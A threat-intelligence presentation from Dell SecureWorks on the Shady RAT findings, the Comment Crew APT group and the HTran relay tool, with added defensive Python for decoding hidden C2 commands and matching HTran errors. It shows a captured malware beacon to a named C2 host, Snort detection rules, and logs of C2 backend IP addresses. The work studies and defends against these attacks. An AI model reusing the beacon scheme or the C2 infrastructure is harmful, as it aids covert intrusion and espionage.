HTran and the Advanced Persistent Threat
Joe Stewart
Director of Malware Research
Dell SecureWorks
Confidential
APT Definition
Cyber-espionage activity targeting government, industry or activists.
APT Attack Targets
• Government
• Military
• Defense Contractors
• Security Companies
• Software Vendors
• Webmail Providers
• Activist Orgs
• Manufacturers
• Global Policy Orgs
• Think-Tanks
APT Attack Tools
• Spear-Phishing
• Zero-Day Exploits
• Custom Backdoors
  • Low AV detection
  • Custom network protocols/encryption
• Custom Toolsets
  • Network Discovery
  • SQL/SMB bruteforce
  • Remote administration
Dell SecureWorks APT Tracking Stats
• 80+ Malware families
• 8500+ C2 hostnames
• 1300+ Domains
  • 55% Registered by APT actors
  • 35% Dynamic DNS names
  • 10% Compromised domains
• 1500+ active IPs
• 1000+ IPS countermeasures deployed
Shady RAT
Shady RAT Report Breakdown
• McAfee found public log analysis pages on an APT control server
• Processed logs only list IPs of 30 “top-talkers” per month
• 666 unique IP addresses
• McAfee identified 72 victims across a broad array of sectors:
  • Government
    • International
    • National
    • State
    • County
  • Military/Military contractors
  • Construction
  • Electronics
  • Computer Security
  • Communications
  • Energy
  • News Media
  • Agriculture
  • Trade Groups
• CTU correlated McAfee’s report with the log data
  • Independently derived complete list of victim names
  • Determined Shady RAT to be part of activity by the “Comment Crew”
Shady RAT – CTU Analysis
• Dell SecureWorks CTU identified 15 additional victims from Shady RAT logs:
  • U.S. Government commission
  • Three additional defense contractors
  • Air Force of Asian nation
  • Financial news service
  • Data backup company
  • Trade group
  • Global policy advocate
  • Scientific supply company
  • Satellite communications company
  • Biomedical institute
  • University
  • Healthcare benefits management firm
  • Seminary School
Comment Crew Malware
• First stage - small downloader trojans
• Designed to periodically request a web page with additional instructions (sleep, download second-stage payload)
• Typical stage-1 phone-home request (User-Agent/URI path varies from variant to variant):

GET /comp/sem/resources.htm HTTP/1.1
User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
Comment Crew Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:56:50 GMT
Server: Apache
Last-Modified: Sat, 26 Mar 2011 02:23:09 GMT
ETag: "a301f7-19ed-49f596435dd40"
Accept-Ranges: bytes
Content-Length: 6637
Content-Type: text/html

<!-- czoyNA== -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Advanced Insurance Management - Information and Resources for Workers' Comp</title>
<style type="text/css">
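The instructions in the response above ride inside the HTML comment at the top of an otherwise ordinary-looking page. The following is an added analyst example, not code from the slides or from Dell SecureWorks: it pulls every HTML comment out of a captured response, keeps only those that are valid base64 decoding to printable ASCII, and flags the malformed User-Agent from the request. The sample request and response are constructed from the slide's excerpt (body truncated), and the command grammar ("s:<seconds>" meaning sleep) is an assumption made here because the token czoyNA== decodes to "s:24" and the slide lists sleep as one of the instructions; the real variants may use other encodings.

```python
import base64
import binascii
import re

# Constructed sample modelled on the slide's exchange (not a real capture, body truncated).
SAMPLE_REQUEST = (
    "GET /comp/sem/resources.htm HTTP/1.1\r\n"
    "User-Agent: HTTP Mozilla/5.0(compatible+MSIE)\r\n"
    "Host: www.cometoway.org\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<!-- czoyNA== -->\r\n"
    "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" "
    "\"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\">\r\n"
    "<html><head><!-- note --><title>Advanced Insurance Management</title>"
    "</head><body></body></html>\r\n"
)

# An HTML comment whose whole body is drawn from the base64 alphabet.
COMMENT_RE = re.compile(r"<!--\s*([A-Za-z0-9+/=]+)\s*-->")


def hidden_commands(body):
    """Return (token, plaintext) for each comment that is valid base64 and
    decodes to printable ASCII. Ordinary comments such as 'note' fail one of
    the checks (bad padding or non-ASCII bytes) and are dropped."""
    out = []
    for m in COMMENT_RE.finditer(body):
        token = m.group(1)
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text and text.isprintable():
            out.append((token, text))
    return out


def classify(text):
    """Assumed grammar (not documented on the slide): 's:<n>' is a sleep of n
    seconds; anything else is handed to the analyst as unknown."""
    m = re.fullmatch(r"s:(\d+)", text)
    if m:
        return ("sleep", int(m.group(1)))
    return ("unknown", text)


def scan_response(raw):
    """Split headers from body and decode every hidden command in the body."""
    _head, _sep, body = raw.partition("\r\n\r\n")
    return [(tok, txt, classify(txt)) for tok, txt in hidden_commands(body)]


def user_agent_anomalies(raw_request):
    """Flag the oddities of the beacon's User-Agent: a leading 'HTTP ' token and
    no space before the parenthesised product list, unlike real browsers."""
    findings = []
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("user-agent:"):
            ua = line.split(":", 1)[1].strip()
            if ua.startswith("HTTP "):
                findings.append("user-agent begins with 'HTTP '")
            if re.search(r"\S\(", ua):
                findings.append("no space before '(' in user-agent")
    return findings


if __name__ == "__main__":
    print(scan_response(SAMPLE_RESPONSE))
    print(user_agent_anomalies(SAMPLE_REQUEST))
```

Run over proxy or IDS captures, a hit from scan_response combined with a User-Agent finding is a strong pivot for the HTTP protocol anomaly detection listed later in the deck; the base64 filter alone will occasionally match short innocent comments, so treat the decoded text, not the presence of a comment, as the signal.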
Shady RAT and the APT Landscape
• Shady RAT is the tip of an iceberg
• Same actor group (Comment Crew) has at least a dozen variants that behave similarly to Shady RAT
• Many more second-stage backdoor trojans
• Each trojan variant has several known control servers
• CTU has tied over 100 different C2s to specific Comment Crew malware samples
• Many more hostnames identified as belonging to Comment Crew domains but malware samples not yet found
• Comment Crew is one of two major APT actor groups, with several minor actor groups also in play
• Shady RAT data likely represents less than 1% of the actual APT activity going on in the world
HTran
HTran
• During classification of APT malware used in RSA attack, interesting pattern identified in network traffic from APT C2 server:
  • Error message, although truncated, appeared to identify hidden backend destination of C2 traffic
• Analysis of error message formatting led to source code for “HTran”, or “HUC Packet Transmit Tool”
  • HUC = Honker Union of China
• HTran is a simple packet bouncer/relay, used to disguise the location of the real C2 server of any malware using TCP communication
• In cases where connectivity is lost between HTran and the backend server, the connection error message will be sent to the connecting client:

[SERVER]connection to funn
HTran Analysis
• Since HTran will in certain cases betray the true location of the hacker, knowing the error message pattern gives us two advantages:
  • Identification of latent APT activity on the network
  • Attribution of origin of APT activity
• Snort rules to detect HTran on the wire:

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HTran Connection Redirect Failure Message"; flow:established,from_server; dsize:<80; content:"|5b|SERVER|5d|connection|20|to|20|"; depth:22; reference:url,www.secureworks.com/research/threats/htran/; sid:1111111111;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HTran Connection Redirect Failure Message (Unicode)"; flow:established,from_server; dsize:<160; content:"|5b00|S|00|E|00|R|00|V|00|E|00|R|005d00|c|00|o|00|n|00|n|00|e|00|c|00|t|00|i|00|o|00|n|002000|t|00|o|002000|"; depth:44; reference:url,www.secureworks.com/research/threats/htran/; sid:1111111112;)
HTran Attribution Project
• Using the list of APT-related hostnames, we resolve all IPs and connect to each one every 10 minutes
• Wait up to 30 seconds for any HTran error messages which might occur
• This survey of APT IPs has yielded plenty of results:

[Thu Jul 28 03:47:59 2011] : [SERVER]connection to 112.64.212.108:8000 error
[Thu Jul 21 01:02:26 2011] : [SERVER]connection to 112.64.214.174:443 error
[Wed Jul 27 01:50:47 2011] : [SERVER]connection to 58.247.246.171:443 error
[Wed Jul 27 14:10:15 2011] : [SERVER]connection to 112.65.84.61:443 error
[Thu Jul 28 02:40:02 2011] : [SERVER]connection to 58.247.242.225:443 error
[Thu Jul 28 03:06:30 2011] : [SERVER]connection to 58.247.242.225:443 error
[Thu Jul 28 09:38:22 2011] : [SERVER]connection to 58.247.244.177:443 error
[Wed Jul 27 14:50:51 2011] : [SERVER]connection to 112.64.215.67:1443 error
HTran Attribution Project
• The survey still continues to yield results:

[Wed Sep 21 00:56:58 2011] : [SERVER]connection to 58.247.25.171:443 error
[Wed Sep 21 03:28:39 2011] : [SERVER]connection to 58.247.25.171:80 error
[Wed Sep 21 06:32:16 2011] : [SERVER]connection to 121.229.200.223:10009 err
[Wed Sep 21 07:47:10 2011] : [SERVER]connection to 112.65.85.93:443 error
[Wed Sep 21 09:00:02 2011] : [SERVER]connection to 112.64.213.222:80 error
[Wed Sep 21 11:28:24 2011] : [SERVER]connection to 112.64.113.17:443 error
[Thu Sep 22 01:27:48 2011] : [SERVER]connection to 58.247.26.203:80 error
[Thu Sep 22 09:13:39 2011] : [SERVER]connection to 202.85.61.150:6654 error
[Thu Sep 22 02:45:17 2011] : [SERVER]connection to 58.247.26.203:443 error
[Fri Sep 23 00:36:35 2011] : [SERVER]connection to 58.247.247.169:443 error
[Fri Sep 23 04:47:20 2011] : [SERVER]connection to 114.92.20.60:80 error
[Fri Sep 23 05:57:29 2011] : [SERVER]connection to 114.92.20.60:443 error
[Fri Sep 23 08:33:42 2011] : [SERVER]connection to 121.229.200.8:10009 error
[Sat Sep 24 06:53:31 2011] : [SERVER]connection to 180.171.193.13:443 error
[Sat Sep 24 18:10:15 2011] : [SERVER]connection to 114.92.28.19:80 error
[Sat Sep 24 03:13:10 2011] : [SERVER]connection to 180.171.193.13:53 error
[Mon Sep 26 01:40:50 2011] : [SERVER]connection to 58.247.24.252:443 error
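The two Snort rules on the HTran Analysis slide and the survey logs on the two Attribution Project slides are two views of the same artefact: the relay's failure message as bytes on the wire, and the backend address an analyst pulls out of it afterwards. The following is an added example, not code from the slides or from the CTU survey tooling, that mirrors the rules' byte checks (content at offset 0, short payload) for both the ASCII and UTF-16LE forms, extracts the hidden backend endpoint, and then parses survey log lines in the slides' format and tallies them per /24 and per port so the clustering on a few networks is visible. The payloads are constructed samples; the log lines are copied from the slides, with the "err" truncation kept. The prefix length used for grouping and the decision to treat a message without an address (the truncated "[SERVER]connection to funn") as a hit without an endpoint are choices made here.

```python
import ipaddress
import re
from collections import Counter

# Byte patterns from the two Snort rules: ASCII form and UTF-16LE ("Unicode") form.
ASCII_PREFIX = b"[SERVER]connection to "                        # 22 bytes, matches depth:22
UNICODE_PREFIX = ASCII_PREFIX.decode("ascii").encode("utf-16-le")  # 44 bytes, matches depth:44


def is_htran_error(payload: bytes):
    """Return 'ascii', 'unicode' or None for one server-to-client payload.
    depth == content length forces the match to offset 0; dsize:<80 / <160 bounds the size."""
    if len(payload) < 80 and payload.startswith(ASCII_PREFIX):
        return "ascii"
    if len(payload) < 160 and payload.startswith(UNICODE_PREFIX):
        return "unicode"
    return None


ENDPOINT_RE = re.compile(r"\[SERVER\]connection to (\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def backend_endpoint(payload: bytes):
    """(ip, port) of the backend the relay failed to reach, or None when the payload
    is not an HTran error or is truncated before the address."""
    kind = is_htran_error(payload)
    if kind is None:
        return None
    text = payload.decode("utf-16-le" if kind == "unicode" else "ascii", errors="replace")
    m = ENDPOINT_RE.search(text)
    return (m.group(1), int(m.group(2))) if m else None


# Survey log format from the slides: "[<timestamp>] : [SERVER]connection to <ip>:<port> error"
LOG_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] : \[SERVER\]connection to (?P<ip>[\d.]+):(?P<port>\d+)")


def parse_survey_log(lines):
    """Yield (timestamp, ip, port) tuples; lines that do not fit the format are skipped."""
    records = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            records.append((m.group("ts"), m.group("ip"), int(m.group("port"))))
    return records


def tally_networks(records, prefixlen=24):
    """Count backend endpoints per /prefixlen so a few hosting networks stand out."""
    counts = Counter()
    for _ts, ip, _port in records:
        counts[str(ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False))] += 1
    return counts


def tally_ports(records):
    """Count backend ports; 443/80 dominate in the slides' data."""
    return Counter(port for _ts, _ip, port in records)


# Constructed sample payloads (not real captures).
SAMPLE_PAYLOADS = [
    b"[SERVER]connection to 112.64.212.108:8000 error\r\n",
    "[SERVER]connection to 58.247.242.225:443 error\r\n".encode("utf-16-le"),
    b"[SERVER]connection to funn",                  # truncated form from the RSA-related traffic
    b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n",     # benign server data
]

# Log lines copied from the slides (the "err" truncation is as shown there).
SAMPLE_LOG = """\
[Thu Jul 28 03:47:59 2011] : [SERVER]connection to 112.64.212.108:8000 error
[Wed Jul 27 01:50:47 2011] : [SERVER]connection to 58.247.246.171:443 error
[Thu Jul 28 02:40:02 2011] : [SERVER]connection to 58.247.242.225:443 error
[Thu Jul 28 03:06:30 2011] : [SERVER]connection to 58.247.242.225:443 error
[Wed Sep 21 06:32:16 2011] : [SERVER]connection to 121.229.200.223:10009 err
""".splitlines()

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print(is_htran_error(p), backend_endpoint(p))
    recs = parse_survey_log(SAMPLE_LOG)
    print(tally_networks(recs).most_common())
    print(tally_ports(recs).most_common())
```

Note that the size bound is part of the signature: a long page that happens to begin with the same bytes is rejected, as the Snort dsize option would reject it, and the UTF-16LE branch is tried second because its first byte pair can never satisfy the ASCII prefix.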
HTran Attribution Project Findings
• Almost all of the HTran errors point to the true C2 being located on just a few networks in mainland China
• Most of the activity is centered around Beijing and Shanghai
• The Comment Crew uses HTran (so does the other major APT actor group)
• Comment Crew HTran-hidden C2s are always found pointing to the Shanghai area
• This kind of attribution is one step beyond regular IP-based attribution, but…
  • It still is only the “where”, not the “who”
  • It is nearly impossible to show a trail of digital evidence to state-sponsored actors (through legal means)
  • But at this point, is there anyone left who doesn’t believe this is state-sponsored activity?
APT Exfiltration Defense-in-Depth
• Strong FW egress policy
• Force HTTP/FTP traffic through proxy
• Force HTTPS traffic through SSL-terminating proxy
• DNS log monitoring
• IPS (only with APT-trojan-aware ruleset)
• HTTP protocol anomaly detection
• Network whitelisting
• Process whitelisting
Q&A
• Send any suspected APT malware samples you encounter to apt@counterthreatunit.com for classification
• Thank you!